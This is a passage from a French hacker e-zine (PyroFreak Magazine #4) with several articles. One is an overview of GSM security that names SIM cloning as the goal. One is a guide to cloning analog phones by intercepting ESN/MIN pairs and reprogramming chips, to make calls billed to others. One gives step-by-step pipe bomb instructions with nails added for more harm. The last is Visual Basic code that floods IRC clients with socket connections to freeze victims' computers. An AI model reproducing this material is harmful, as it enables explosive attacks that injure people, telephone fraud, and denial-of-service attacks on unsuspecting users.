systeme GSM (Groupe Special Mobile) dont la principale caracteristique est 
qu'ils utilisent un encryptage et un transfere de donnees numeriques.
Avec les cells analogiques, on pouvait facilement intercepter n'importe
kelle conversation avec un scanner et meme des infos interessantes comme
l'ESN et le MIN ki etaient necessaires pour cloner. La perte de profits
a ete estimee a 500 millions de $ aux States en 1993.
Le fonctionnement du systeme de securite des GSM fait de lui le moyen de 
telephonie cellulaire le plus sur de nos jours. C'est notament parcekil 
utilise plusieurs algo d'encrytage differents pour la voix, l'envoi des
data de l'abonnement (etc), et le TDMA (Time Division Multiple Access) ki
en gros envoie les data par packets codes.
Le phreaking de ces petites choses s'annonce donc difficile.
Deux possibilites :
1) Trouver les algos (Une partie d'un a deja ete diffusee sur le net)
2) Cloner les cartes SIM (Micro-controleur) avec le materiel adapte.
Sans aucun doute, la seconde est la meilleure des solutions :))
A ma connaissance, des clones ont deja ete realises par des mecs de la 
scene et par d'autre dans le milieu de l'elec. Donc c possible.


Parametres necessaires au fonctionnement du cell
------------------------------------------------

L'utilisateur d'un cellulaire est identifie par un numero appele
le IMSI (International Mobile Subscriber Identity) k'on peut assimiler a 
l'ESN des cells analogiques (voir NoRacell 2.X). Il faut noter kil est 
couple d'un autre numero cle (key) appele le Identification Subscriber
Authentication Key ke l'on abrege en "Ki". Le fonctionnement de ce
systeme de securite est tel kil ne communique jamais directement ces infos
sur le canal radio. Le systeme utilise a la place, un mecanisme d'interro-
-gation-reponse entre le cellulaire et la centrale.
Les conversations, elles, sont envoyees dans les airs apres etre passees
par une autre key aleatoire cette fois. On l'appelle la Ciphering Key abregee
en "Kc".
En ce ki concerne l'identification du mobile en lui meme lorskil est allume
mais en dehors d'une communication, le systeme utilise un autre number lui
aussi temporaire pour plus de securite : le TMSI ou Temporary Mobile 
Subscriber Identity.

Ce systeme de securite est physiquement base sur 3 parametres contenant 
chacun des elements d'encryptage :

-La carte SIM (Subscriber Identity Module) : elle contient le IMSI, la "Ki"
ainsi ke sont algo de generation le A3, la "Kc" et son algo le A8, et pour
finir le PIN number de l'utilisateur (numero personnel de verouillage du
combine).
-Le cellulaire en lui-meme : contient l'algo de generation principal le A5
(celui dont une partie a ete diffusee sur le net en juin 1994).
-Le reseau GSM ou la centrale : detient evidement les Algo A3, A5, et A8
pour le decryptage des donnees a l'arrivee. La centrale detient aussi 
toutes les databases concernant les users : les IMSI de chacun, le TMSI, 
les LAI (Location Area Identity), et egalement la "Ki" de chacun.

Ces 3 parametres sont donc indispensables pour placer un appel et la 
multiplication des algo assure un bon rampart contre le phreaking.
Mais kome vous avez pu le constater, presque tout est contenu dans la carte
SIM, c'est donc a ca k'il fo s'interesser :). En effet, si tous ces numeros
peuvent etre clones, on a de fortes chances ke ca marche.


        __||                                        TMSI 
       | _ |                                       /
       ||_||                                  ___ /
       |   | ----> A5                        | @ | ----> IMSI
       |   |                                 |   | ----> Ki (A3)
       |___|                                 |___| ----> Kc (A8)
                                                 \
        GSM                                   SIM \
                                                   LAI


Traitement de l'information par la centrale pour ouvrir la ligne
----------------------------------------------------------------

Comme dit plus haut, l'appel sera possible si la SIM, le cell, et la 
centrale sont d'accords.
Dans le reseau de la centrale, l'information relative a la securite est 
traitee par le centre d'autentification (AUC). Le AUC est charge de generer
une sequence necessaire au traitement de ces data. Il genere donc
le RAND puis recoit le SRES.
Le RAND est un nombre de 128 bits genere de facon aleatoire et envoye au
cellulaire. Le cellulaire (ou plutot la SIM) calcule une reponse de 32 bits
appelee SRES en fonction de sa "Ki" propre, generee, elle, par l'algo A3.
En recevant cette reponse (SRES) la centrale verifie en refaisant le calcul
et identifie ou non le cellulaire comme etant valide. Notez ke la "Ki" n'est
jamais transmise dans les airs, elle reste sur la SIM tout comme le IMSI.

   
   |               __                        | 
  /_\             | @|                      /_\
 /___\ -->RAND--> |  | -->Ki(A3)-->SRES--> /___\ --> Ouverture de la ligne
/     \           |__|                    /     \

Centrale          SIM                    Centrale


Encryptage des communications vocales et confidentialite
--------------------------------------------------------

La SIM contient, comme dit plus haut, la "Kc" (ou key d'encryptage des 
communications vocales de 64 bits) ainsi ke sont algo le A8. La "Kc" use
le meme numero aleatoire envoye par la centrale : le RAND. Le A8 genere donc
avec la "Ki" de l'utilisateur la "Kc". Cette cle d'encryptage "Kc" est
regulierement changee par la centrale :(.
De la meme maniere ke pour la "Ki", la "Kc" n'est jamais revelee et reste
toujours dans la SIM. Elle est d'ailleurs calculee a l'interieur.
Une fois cette cle d'encryptage generee (Kc), la centrale fait une demande
de communication avec le cellulaire et c'est la qu'intervient l'algo de
generation A5 contenu dans le combine. Le decryptage et l'encryptage se fait
grace au A5 et a la "Kc".
Enfin, pour confirmer l'identification du cellulaire apres les procedures
citees plus haut, la centrale envoie un nombre temporaire appele le TMSI
et attend un reponse du mobile. Le TMSI est provisoire car il depend de 
la position du cellulaire, il change donc a chaque fois ke le cellulaire
change d'endroit (poa pratique pour le clonage). Le LAI (Location Area
Identification) est necessaire pour traiter le TMSI.


Conclusion
----------

Le systeme GSM est le plus sure du monde a l'heure actuelle. L'utilisation
de l'identification codee, de l'encryptage et de l'identification tempo-
-raire assure normalement une bonne securite. Il est de toute maniere
plus secure ke l'ancien systeme analogique.
Le seul moyen evident pour le phreaker est le clonage de la carte SIM.
Reste seulement a trouver un abo bien garni, et le matos pour reprogrammer
tout ca. A vous de jouer :)


Definitions
-----------

A3 : Algo d'identification
A5 : Algo d'encryptage
A8 : Algo de generation de cle d'encryptage "Kc"
AMPS : Advanced Mobile Phone System (systeme analogique)
AUC : Authentication Center
GSM : Group Special Mobile
IMSI : International Mobile Subscriber Identity 
Kc : Ciphering Key (encryptage)
Ki : Individual Subscriber Authentication Key (identification)
LAI : Locatoin Area Identity
RAND : Random Number
SRES : Signed Response
TACS : Total Access Communications System (systeme analogique)
TMSI : Temporary Mobile Subscriber Identity 



Fait pas SlasHerZ pour Pyro Phreak.fr
Je me demande !! Si je peux faire mieux !! quand dites-vous ? :)




 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| La Theorie Du Phreaking de Cellulaire Analogique
'.________ __ __ ___________ ____ ____________ _ __ ____SlasHerZ __


La Theorie Du Phreaking de Cellulaire Analogique.


Ce Filez est destine a vous apprendre les bases du Cellular phreaking mais 
en francais pour pas vous fatiguer :) Eh bin ouais g'lai fait pour vous 
mes ptits loups... :). Ceci n'est que la theorie du phreaking, toutes les 
sections de reprogrammage sont disponibles sur le web... PS : Ceci n'est 
pas exclusivement une traduction, g remanie le filez a ma maniere et 
ajouter kelkes explikations made in me. :))

Note : Ce filez est uniquement valable pour les cellulaires analogiques. Les
Cellulaires dit "digitaux" ou "numeriques" ne sont poa phreakables pour 
l'instant.


PART I

Cellular Phreaking : Bases

Kan on fait un appel avec un cellulaire, ca transmet 3 numeros importants a 
l'identification du cellulaire : le ESN (numero de securite electronique), 
le MIN (numero d'identification du mobile) et le SCM (numero de Sation Class 
Mark c-a-d la marque du cellulaire). Ces 3 N° sont envoyes a la centrale avant 
le numero de phone et vous pouvez l'entendre apres avoir presser le bouton SND 
'SEND' sur votre phonetel par un petit buzz tres court. Ces 4 elements sont les 
conditions necessaires pour ke la centrale vous donne une communication facturee 
(enfin jve dire poa a vous mais kelle ait l'impression) en verifiant ke le 
cellulairen appartient bien a l'utilisateur en kestion.

Il y a normalement 2 compagnies de phonetel cellulaire dans une zone. L'Une est la compagnie
avec un reseau a lignes (Band B) l'autre est la compagnie a reseau hertzien (Band A). Chaque
Band possede 416 canaux ce qui fait en tout 832 canaux :). Dans ces band de canaux il ya des
des sous-canaux qui eux transmettent les infos de la centrale juskau cellulaire.

Le ESN (numero de securite electronique) et le MIN (numero d'identification du mobile) sont
les 2 premiers identificateurs pour n'importe kel cellulaire. En changeant les 2, la centrale
va accepter l'appel et le facturer vers un mauvais compte ou un compte fictif qui pour elle 
sera kome un compte non deconnecte. La centrale va checker les 2 autres elements a savoir
le SCM (la marque du cellulaire) et le numero de telephone du cellulaire pour s'assurer que 
c'est un telephone cellulaire du marche.

Le fait de changer le SCM (numero de marque du cellulaire) vous empechez la centrale de con-
naitre le type de phonetel ki fait l'appel. En faisant ainsi, vous vous protegez du tracage 
puisque ces connards chercherons une marque en particulier alors que votre cellulaire phreake
est fictif. KEwl. Par exemple : vous pouvez dire ke vous utilisez un phonetel Ericsson 
alors ke vous uilisez un Motorola... :)

Il reste un numero hyper important le NAM (numero d'assignement du module) qui contient tout ce 
qui peut etre reprogrammer seulement grace au handset (la programmation direct par les touches 
du cellulaires, donc par le consommateur neophite :) ). En gros le NAM correspond au chiffres
qu'il faut taper pour mettre la ligne du cellulaire en service. Dans ce NAM il ya plein de sous
numeros qui definissent des parametres comme de SIDH (Systeme d'identifictation du mobile). 
Vous l'aurez compris le SIDH determine la localisation du cellulaire et des frequences (villes).
Reprogrammer un SIDH ne prend que kelkes minutes mais faites attention de verifier que le ESN 
(numero de securite electronique) est toujours envoye a la centrale car s'ils voient k'il ne 
correspond poa a un phonetel en service ou a un phonetel possedant un faux ESN alors ils 
bloqueront le service. La seule solution apres ca c de reprogrammer le ESN.

******************************************************************************************

PART II

Definitions 

La liste qui suit definit les termes communs utilises pour le phreaking de cellulaire.
Rem : Je vais les citer en anglais pour vous retrouver avec les autres txt en english ;).

Tous les numbas ki suivent sont contenus dans le NAM (Numero d'assignement du module). 

SIDH (System Identification for the Home System) dans le NAM
Un champ de 15 bits situe dans le NAM. Habituellement, c un
numero a 5 digits : 

Digit 1: Haut parleur interne, 0 enable
Digit 2: Local Use Mark, 0 ou 1. (voir plus loin)
Digit 3: MIN Mark, 0 ou 1. (voir plus loin)
Digit 4: Rappel Auto, Toujours sur 1 (enabled).
Digit 5: Second numero de telephone ??? (pas sur tous les phonetel), 1 pour enable.
Digit 6: Divers (Deux antennes, poa tous les phonetel), 1 pour enable.

LU (Local Use Flag) 
Dit au cellulaire de se prepresenter au system c'est a dire de transmettre les 
paramettre de connection a la ligne des la pression sur la touche 'deccrocher' du cellulaire. 
1 enable. Mettez theoriquement sur 1. Sinon le cellulaire entamera une postpresentation c'est a 
dire apres avoir entre le numero de telephone.

MIN1 (Mobile Identification Number 1) 
Un champ de 24 bits representant le numero de telephone du mobile (tres important)

MIN2 (Mobile Identification Number 2) 
Un champ de 10 bits representant le code zone (area code) du MIN.

MIN1+MIN2 
Representent a eux deux le numero de telephone a 10 chiffres du cellulaire.

MIN MARK (Mobile Identification Number Mark) 
Repere de 1 bit ordonnant ou non l'envoie du MIN2 lors d'un appel, donc le code zone (area code)
du cellulaire. 1 enable. Mettez sur 1.

SCM (Station Class Mark ou marque du cellulaire) 
Un champ de 4 bits designant la marque du cellulaire.

IPCH (Initial Paging Channel for Home system) 
Un champ de 11 bits designant le canal initial a choisir pour le system du domicile.
Normalement c'est 334 pour les systemes de centrales avec reseau a lignes et 333 pour 
les systemes de centrales avec reseau hertzien. Mais la plupart des cellulaires ont leur
propre canal ou un canal different.

ACCOLC (Access Overload Class) 
Un champ de 4 bits designant le status du cellulaire dans le systeme. Kewl ce truc :). Le but
de cette option est de donner un priorite a certain cellulaires kome ceux des ambulances :).
Le choix normal est 0 + la derniere digit du N° telephone du cellulaire. Les telephones de test
sont a 10, les vehicules d'urgence a 11, 12, et 15 est reserve (probablement la police, les 
pompiers ou les militaires : a ne poa untiliser biensur).

PS (Preferred system) 
Un Champ de 11 bits designant le systeme preferrentiel. il est en rapport avec le 
IPCH (Initial Paging Channel for Home system). Si il est regle sur 0, les canaux allant
de 334 à 666 (Satan!) seront utilises. Si le PS est sur 1 les canaux allant de 1 a 333 seront
utilises. Les numeros de systeme 'even' necessitent un PS en 0, les numeros de systeme 'odd'
necessitent un PS en 1.

GIM (Group Identification Mark)
Un champ de 4 bits dictant a la centrale du cellulaire la limite de verification dans le 
SIDH pour determiner si c'est un cellulaire environnant qui devrait avoir un agrement de zone
avec la centrale. Habituellement regle sur 10. (jsais c poa tres tres clair mais jessaye
d'interpreter le mieux possible :)...)

LOCK DIGITS 
Un champ de 4 bits designant le code d'acces au cellulaire (code perso). La digit 0 dans le 
LOCK CODE est representee par un A dans le NAM en hexadecimal. Le code par defaut est 000.

EE (End-to-End)
Un repere de 1 bit ordonnant au cellulaire de traiter les tones en DTMF du cellulaire de 
maniere plus longue c a dire en mode standard car celle du cell sont trop courtes.
Cette option est necessaire pour les services a touches. 
...VMB :-)... PABX :-)...

REP (Repertory) 
Un repere de 1 bit annoncant ke les numeros mis en memoires sont enable. 1 enable.

HA (Horn Alert) 
Un repere de 1 bit annoncant ke la sonnerie du cellulaire est enable. 1 enable.

HF (Hanf Free) 
Un repere de 1 bit annoncant ke la fonction mains libres est activee. 1 enable.


PART III

Formats de NAM standards

Les NAM sont generalement programmer de facon analogue dans tous les cellulaires. Ce chapitre
explique les digits et les reglages communs pour la plupart des NAM.

ETAPE DESCRIPTION NOMBRE DE DIGITS REGLAGE PAR DEFAUT
--------------------------------------------------------------------------
1 3 1ere digits 3 XXX
du N° de PHONE

2 4 dernieres digits 4 XXXX
du N° de PHONE

3 Lock Code(LOCK) 3 ou 4 XXXA ou XXXX 

4 Code zone (MIN2) 3 XXX
=(area code) 

5 Systeme d'ID mobile
ID No. (SIDH) 4* XXXX

6 Horn Alert (HA) 1 0 or 1

7 Hands Free (HF) 1 0 or 1

8 End-to-End Signalement 1 1
(EE)

9 Repertory Mark (REP) 1 1

10 Group Identification 2 10
Mark (GIM)

11 Access Overload Class 2 XX*
(ACCOLC)

12 Station Class Mark (SCM) 4* XXXX

13 Local Use Mark (LU) 1 1

14 Min Mark (MIN) 1 1

15 Initial Paging Channel 3 333 ou 334*
(IPCH)

16 Preferred System Mark 1 0 or 1*
(PS)

Notes :

1. Le SIDH (Systeme D'identification de la zone) est compose normalement de
cinq digits et quatre suffisent pour les USA.

2.Le numero d'Access Overload Class (2 didgits) est normalement compose d'un 0 plus le dernier
chiffre du numero de phone du cellulaire. Certains systemes sont regles a 15 ou 00.

3.Le numero de Station Class Mark (SCM, la marque du cellulaire) est compose de 4 digits.

4.Le Initial Paging Channel est 334 pour les ligne a reseau par fil, 333 pour les systemes a
reseau hertzien.

5.Le numero de systeme preferrentiel (Preferred Mark System, PS) doit etre regler sur 0 pour 
les reseaux a fil, sur 1 pour les reseaux hertziens.

PART IV

Le numero de securite electronique, ou numero de serie, ou ESN

Quand un cellulaire est achete avec sa boite, l'ESN est normalement livre avec la doc ou sur un
autocollant situe sur le phonetel. Ce ESN est le bon et la mise en service se fait alors vite.
Si le cellulaire a ete bloque par la centrale pour non payement de la facture telephone, la 
personne qui veut remettre en service le cellulaire doit posseder cet ESN de facon a reprogram
-mer le systeme avec un nouveau ESN et un nouveau MIN (il sont en rapport car le MIN contient
le numba de telephone qui est en fonction de l'ESN). Chaque fabriquant determine son propre ESN,
mais il est possible qu'ils en possedent en commun. Par exemple, il peut y avoir un Motorola 
avec un ESN a 123456, et un Audiovox avec un ESN a 123456 (OK ?...).
Partant de ce principe, il est possible de phreaker un ligne sans changer l'ESN, mais plutot le 
SCM (Station Class Mark) (pour faire croire ke c'est un autre phonetel).

L'ESN est un nombre de 32 bits, ki defini chaque unite portable. Cet ESN est porgramme en usine
et ne peut etre modifie. Il faut alors commander une puce vierge du meme modele et la reprogram-
-mer avec nos propres parametres. L'ESN de la puce peut ou non etre en relation avec celui inscrit
sur le chassis du cellulaire. L'ESN est encode dans des messages qui sont transmis a la centrale
du cellulaire. Il doit vous etre demande lors de la mise en service. L'ESN est un nombre a 
11 digits. LES 3 PREMIERS NOMBRES DESIGNENT LE CODE DU FABRICANT...LES 2 SUIVANTS SONT RESERVES
(MAIS DOIVENT CONTENIR DES 00 OU DES CHIFFRES) ET 6 RESTANTS REPRESENTENT LE NUMERO DE SERIE...

PART V

Identifier l'ESN de votre cellulaire.

Dependant du modele de votre phonetel, votre ESN sera situe sur la PROM. La PROM, petite puce,
est porgrammee en usine et habituellement installee avec ,un fusible de securite contre le pira-
tage. Le code sur la PROM devrait etre obtenu en detachant la puce du cellulaire, en la mettant
dans un lecteur de PROM, et en obtenant ainsi une image de sa memoire.

La PROM d'un cellulaire possede de 16 a 28 broches. C'est une PROM bipolaire.(Voir ESN.GIF).
La majorite des cellulaires acceptent la puce de type semiconducteur 32x8 PROM, qui detient
l'ESN et ne peut poa etre reprogramme. Si l'ESN est konu, il est possible de detecter le plan
de la memoire en installant la PROM dans un lecteur de PROM, et en obtenant le schema du fusible
de protection en nickant le "READ MASTER" switche (un ptit jumper koi) grace au reprogrammeur.
De plus, la plupart des prog de reprogrammation de PROM ont la possibilite de verifier et com-
parer la programmation d'une PROM avec une autre.

La puce contenant l'ESN est de couleur noire uniforme (normale, hehe), avec de 16 a 28 broches,
rectangulaire (enveloppe ceramique) ou carree (enveloppe plastique, plus petit). Fonctionnellem-
-ent ce sont les memes chips mais celui en plastique est utilise dans les plus petits cellulaires.
Il ya des inscriptions dessus grace auxkelles vous pourrez les reconnaitre :
MMI, TI, NS, HARRIS, NSC, MB, DM, HM, AMD(hehe), TBP, MOTOROLA(hehe good), AMPS.
Lorsque vous avez localiser le chip, essayez d'en acheter un nouveau en prenant soin de relever 
ses referrences. Ou ca ? bah chez n'importe kel fournisseur electronique, sur commande. (achetez
en plusieurs c mieux, au moins 3). :)

PART VI

Scanner et trouver la paire ESN/MIN correcte

Bon si vous n'avez toujours poa compris, l'ESN et le MIN du cellulaire doivent etre changes
ou sinon ca marchera poa. C'est obligatoire pour eviter la facture de phone :). Si vous avez
un ESN et le n° de telephone (MIN), vous pourrez appeler partout kan vous voulez sans peur 
d'etre trace, sans meme un facture :)). La demarche ideale serait de scanner le canal 
d'emission de frequence (voir plus loin), enregistrer et afficher les ESN.

Tous les codes sont envoyes en Hexadecimal, en NRZ code quand un abonne fait un appel. Et tous
les cellulaires ont un emetteur/recepteur NRZ ! :). Tout ce kon a faire c'est d'avoir un
recepteur sur le canal d'emission de frequence (voir plus loin), capter les infos des autres 
abonnes.

Les cellulaires communiquent en full duplex c'est a dire k'ils recoivent en meme tant k'ils
emettent. Un canal est utilise pour la transmission de la centrale au phonetel, une autre de
du phonetel a la centrale. Les frequences qu'envoie la centrale au cellulaire sont exactement 
plus hautes de 45Mhz que celles qu'envoie le cellulaire a la centrale.
et ces deux canaux sont incrementees de 30Khz entre chaque frequence #1 a #1023. (rem : il 
n'y a poa de canal entre #800 et #990).

Avec certains systemes (poa tous) la transmission du cellulaire est envoyee d'abord a la 
centrale puis renvoyee sur la meme frenquence de la centrale. Kan cela est fait, un scanner de
frequences peut ecouter les deux cotes de la conversation en ecoutant simplement la frequence
de la centrale :)). Voila pkoi, lorsque vous entendez une voix parfois dans votre sans fil
d'appart vous captez les voisins mais eux ne peuvent poa vous capter (parceka ce moment la,
votre phone est en full duplex).

***Vous pouvez trouver la liste des frequences d'un cellulaire dans le fichiers Cell-Freq.txt****
*******Ou procurez vous Cellular Manager 2.00 ki donne la liste des toutes ces frequences********


Maintenant, une petite methode pour trouver les frequences utilisees dans systeme de cellulaire,
et leskels sont dans kels cellulaires. Si le systeme utilise OMNICELLS, kome la plupart, vous 
pouvez facilement trouver tous les canaux de votre cellulaire si vous en konaissez juste un 
grace aux tables de frequences suivantes.

Les frequences d'un cellulaire sont assignees par un n° de canal, et pour tous les canaux, 
c a dire les deux groupes reunis a savoir reseau hertzien, et reseau cable, la formule est :

Frequence de reception = (numero du canal x 0.030 Mhz) + 870 Mhz
Frequence d' emission = (numero du canal x 0.030 Mhz) + 825 Mhz

Ce qui donne ex : pour le canal N°1 de la band A 0.030 + 870 = 870.03 Mhz

La BAND A utilise les canaux de 1 a 333. Pour construire un tableau de frequences de cellulaire,
mettez la canal 333 dans le coin en haut a gauche du tableau. La prochaine a droite sera le canal
332(hehe, normal), le prochain 331(arf)...juskau canal 313. Mettez le canal 312 en dessous du 333,
le 311 en dessous du 332 etc... OK ? :)). Chaque canal en haut du tableau est normalement le 1ere
canal de chaque cellulaire du systeme. Chaque canal en bas du tableau dans la meme colonne est la
prochaine frequence assignee a ce cellulaire. Habituellement le canal utilise pour les infos
est le plus grand numero de canal dans le cellulaire. (Si vous avez rien compris, relisez en 
regardant les tableaux qui vont suivre, c tres explicite :)).

De meme, la BAND B utilise les canaux de 334 a 666. La, le tout premier numero de canal sera 334
en haut a gauche, 335 la prochain sur la droite... Attention ! Ici le canal utilise pour les 
infos sera le canal qui aura le nombre le plus petit dans chaque cellulaire.

J'aurai les fréquence bien vite !! tk je l'espère !

Jespere ke ce ptit filez vous a ete profitable...
SlasHerZ



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Pipe bomb à la endrix!!!
'.________ __ __ ___________ ____ ______________Par Neuro et Endrix __



Pipe Bomb à la endrix :)
-----------------------


Vous devez tenir compte qu'une pipe bomb est TRÈS dangeureux. Sa
construction peut être dangeureuse.. C'est pourquoi je vous demande
de faire très attention en la construisant et sourtout avant de la
faire exploser, tout vérifié pour ne pas qu'elle vous pete dans la
face, car si c'est le cas, vous risquez d'être très sérieusement
blaissé et même possible d'y laisser votre peau. Je veux aussi dire
que je ne fais que vous informer avec ce texte, je vous incite pas
à la faire!!! Alors s'il y arrive un problème en fesant exploser
cette bombe, si vous vous faites mal.. Bien je ne suis en
AUCUNEMENT RESPONSABLE DE VOS GESTES !!! Je ne fais que vous
instruires........

anyway

Pipe Bomb :
¯¯¯¯¯¯¯¯¯¯¯
la force de cette bombe est du a la compression avant explosion..
Quand la pression à l'intérieur est devenu trop élevé pour qu'elle
reste intacte, BAAAAAAOOOOOOMMMMMMMMMMMMM!!!!!!!!!!! Ce qui veut
dire, construiser la minucieusement.. :)


Matériels : - Ciseau (Très coupant)
¯¯¯¯¯¯¯¯¯¯¯ - Pourdre a canon (vous pouvez en prendre dans des jeux 
              d'artifices)
            - Condom :)
            - Gaz
            - Tuyau de plastique ou métal avec 2 bouchons
            - Clous (optionnel)
            - Duck TAPE!
            - Mèche
            - Perceuse

Construction : 1 - Défaire le feux d'artifice pour y prendre la 
¯¯¯¯¯¯¯¯¯¯¯¯¯¯ poudre et aussi pour prendre la mèche.

Note : Y aller doucement pour ne pas faire partir le 
       jeux d'artifice dans votre maison ou, comme moi, 
       dans votre laboratoire(remise).


2 - Prendre le toyau, bloquer un bout avec un bouchon.

Note : il faut que ce soit TRÈS solide pour qu'il y ai
       assez de pression pour provoquer l'explosion.


3 - Prendre le condom, le mettre dans le tuyau, remplir
    le condom de gaz pour qu'il fasse juste dans le
    tuyau et faire un noeu au bout pour empècher le gaz 
    de s'échapper.


4 - Mettre de la poudre au bout, ou le condom finnit...
    Parce que quand on va allumer la poudre, on veut
    qu'elle fasse partir le gaz pour faire le gros boum !

Note : Remplir jusqu'au bord mais il faut laisser de la
       place pour pouvoir boucher cet extrémité du tuyau.


5 - Percer un PETIT trou dans le bouchon restant. Je vous
    conseille d'en utiliser un qui se visse de manière a
    ce que si vous voullez faire une modification a votre
    bombe, il est plus facile en dévissant qu'en décollant =P

Note : il faut faire un trou assez gros pour y laisser
       passer la mèche mais assez gros pour que le feu
       entre dans la pipe bomb...


6 - Mettre du tape à l'entour de la mèche, sans obstruer
    l'orifice ou la flâme va passer. 


7 - Avec le tape, il faut accroché des clous à l'entour de
    la pipe bomb.

Note : Le plus qu'il va y en avoir, le plus de domage il va
       y avoir :)))))

8 - Maintenant elle est prète a faire exploser :))))))))


Voici le motif de la bombe :


         \!/ <------ Flâme, qui veut dire... RRRUUUUUUNNNNNNNNN!!!!!
          |
          | <--- Mèche
          |
         ||| <---- Bouchon qui se visse
        |¯¯¯|
        |   |
        |   |
        |   |
        |   | 
        |   |   <---- Toyau de plastique ou Métal
        |   | 
        |   | 
        |___|
          
          ^
          |____ Bouchon qui ne se fisse pas

Enfin on peut dire que c'est un pétard a mèche géant!



En tk.. M'a vous dire que si vous suivez mes instructions à la lettre la,
c'est sur que vous vous allez être capable de faire péter n'importe quoi!
Mais n'oubliez pas de faire attention à la construction de la bombe et
comment vous allez la faire péter !!!

Play safe ]...[ endrix



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| mIRC 5.3x Exploit encore efficace!
'.________ __ __ ___________ ____ __________ __ ____Par CyberRider __




Bon bon Cette semaine en allant sur irc je me suis rendu compte encro que 
plusieur personne avait encor mirc 5.3x et vous vous souvenez du bug qui 
freezais les ordi accause de mric 5.3x bon sois vous savez que c est 
depasasser ou sois que vous ne saviez pas hey bien maintenant que c'est 
pomal mort essayons de faire le program pour pouvoir freezer le mirc 5.3x hmmmmmm 
binsur les source que ej vais ecrire vont etre en Visual Basic (moi je prend le 5.0) 
et utiliseron les controel de upd et tcp de Netmanage (activex60) ok ce sera 
seulement une tite source car javais rien a ecrire et je veut ecrire kekchose 
bon!! ok commencon sur notre feuille de programmation Now!

Bon on a une feuille et la on veut les controel de netmanage donc on va aller 
laoder netmanage Winsock Controle! ok c simple! Bon vous voulez netmanage car 
vous avez po cette cochonerie de netmanage winsock controle bon bon aller la
http://www.warforge.com/cgi-bin/dlpro.cgi?windows/dos/filesneeded/activex602.zip

ok c cool on la sa prend apenne 6 mo entk bon retournons a la programmation de 
ce petit util bin simple bin depasasser qui sert kasdiment pu a rien (aussi 
lame qu un Nuke) mais bon c simple a faire!!! bon go!

bon aller la on a tous bon criss enfin on commence!!! ok bon un vu que sa rapport 
au net tu criss le socket de TCP sur ta feuille bon euh je le dis juste maintenant 
as stu palte tu peut surment etre capable de le fair avec mswinsck.ocx aussi mais 
bon lol moi jle fait avec netmanage ;) lol!! entk bon go go go!!

ok le controle tcp est maintenat sur notre feuille donc on peut etablir des 
connection sul net! (sa marche aussi si vous avez 2 pc en resaux pis que ta 
soeur est sur mirc pis qua veut po lacher le net accause que c est une accro 
pis que la toi tu veut la planter bin tu fa comme si son ip sa serait le nom 
dans voissinage resaux tu entre sa a palce du ip boom la a crit Cyberride vien 
arrenger lordi la tu va alvoir et tu lui dit que papa va etre fru qua vien 
daccepter le plus gros virus!!!) 

bon la moi ma commencer a mettre tu suite sur ma feuille un boutton stop et un 
boutton start lol c un bon debut aussi ma mettre 2 text box un pour le ip et 
lautre pour le nombre de socket ensuite ma mettre une autre text pour mon status 
sa va faire plus professionel avec un status! psi aussi ma mettre la pic de lolo 
ferrari en back ground pour que sa fasse moin professionel bon faut bin trouver 
une utilité au prog tsé! bon ok!!

mes box ip et lautre Socks ensuite lautre status

ensuite pour starter un peut dans le source allons dans générale!! bon on va i 
déclarez 2 tite variable ic sa va etre le fun ;)

Option Explicit
Dim Freeze As String
Dim Socks As String

bon nos 2 varaible son déclarez a koi y vont servire ?? hmmmm 2 sec!!! bon Freeze 
sa va etre pour le stop ou le start genre on va faire des if avec des true or false 
tsé comprendo? non! ok c est cool! bon pis scok sa va etre le nombre de socks a 
utiliser! pkoi tu prend pas direct la textbox??? aille laisse moi faire je sais ske 
je fait ok!

bon!
apres le blabla innutil arrive enfin de la programmation ha bon! yetait temp!!
on va crisser sa dans notre boutton start pour que sa aille miuex bon ok liser les 
listing en dessous des ligne pour cmprendre k?

On Error Resume Next
' k bon sa spour si sa fa une erreur sa continue et fait po crasher le prog pour rien 
' bon tous 
' bon programmeur c sa!

If IP = "127.0.0.1" Then
If MsgBox("Tu va te faire des bobo a ton irc a toi???", vbYesNo) = vbNo Then
Exit Sub
' ok pour c est trois ligne ta compris?? si tu rentre ton toi sa demande si tu veut tuer 
' ton toi 
' c claire no???
End If
End If
' 2 block if parce qui a 2 if en haut!
Socks = Socks.Text 
' notre socks!
If Socks = "" Or IsNumeric(Socks) = False Then
Status = "Erreur: Sa prend des soket hein!!"
Exit Sub
' Ici c pour etre sur qui a des socket selectionner pour etre sur que sa palnte po durand 
' le prog 
' (pour etre sur que sa marhce)
End If
If IP = "" Or IsNumeric(IP) = False Then
Status = "Erreur: Sa prend un Ip !"
Exit Sub
' Sa spour que sa soit un ip bon tu peut lauter si cest pour planter ta soeur acoter sur lautre 
' ordi lol!
End If
Status = "Geling the pc lol " & IP & " (" & Socks & ")"
' status pour dire que el fun commence!
Freeze = True
' sa dit a notre tite varaible quon sen sert la!
Dim socket As Variant
Dim SockInstance As Integer
For SockInstance = 1 To Socks
Load winsock(SockInstance)
Next SockInstance
For Each socket In winsock
socket.Connect IP, "113"
Next
' ok la on a declarez 2 variable on en set une a 1 to le nombre de sock du debut! et ensuite on 
' les laod tous apres on connect le premier socket et ainsi de suite avec le Next on connect les 
' autre! Juste ce connecter?? pis son ou les commande full thrash hot man?? Tayuele pedale scon 
' veut stun buffer overflow pour geler le prog ;))) youpi!! 

bon la le reste de larticle est innutil presque mais je lecrit quand meme des 
fois que la pitier vous pogne pendant que vous etes entraint de vous connectez 
2 mille fois sur un povre client mirc 5.3x bon la on peut foutre les prochaine 
ligne a 2 place moi je dirais que sa change rien de la mettre ou pas a la 2ieme 
place mais bon c toujours mieux ok fouter sa dans le unload form et dans votre 
boutton stop!!! c cool comme sa on va stoiper toute les connection!!

If Freeze = False Then Exit Sub
' tin si sa marche po on peut po larreter hein!!!
Dim socket As Variant
For Each socket In winsock
socket.Close
Next
Status = "Stoper"
' Tin on les ferme toutes et on change le status wow!! 
bon ok javais nommer uen de mes box ip et lautre Socks ensuite lautre status 
surment pas besoin de dir a koi chacune sert hein!!

c fini on est maintenat rendu des lamer qui gele tous les mirc 5.3 sur irc wow!!! 
wow c vraiment un feeling intence que jai la!! ok bon pkois tu nous a casser la 
tete avec des chose de programmation dememe quand on aurait pu le mettre pomal 
plus petit que sa notre prog meme plus simple et bang on aurait puf aire encor 
plus de victim sans ta criss de perte de temp bon bon bon avant de chailer tsé 
faut quand meme se faire du fun a le programmer hien le prog un prog en 3 ligne 
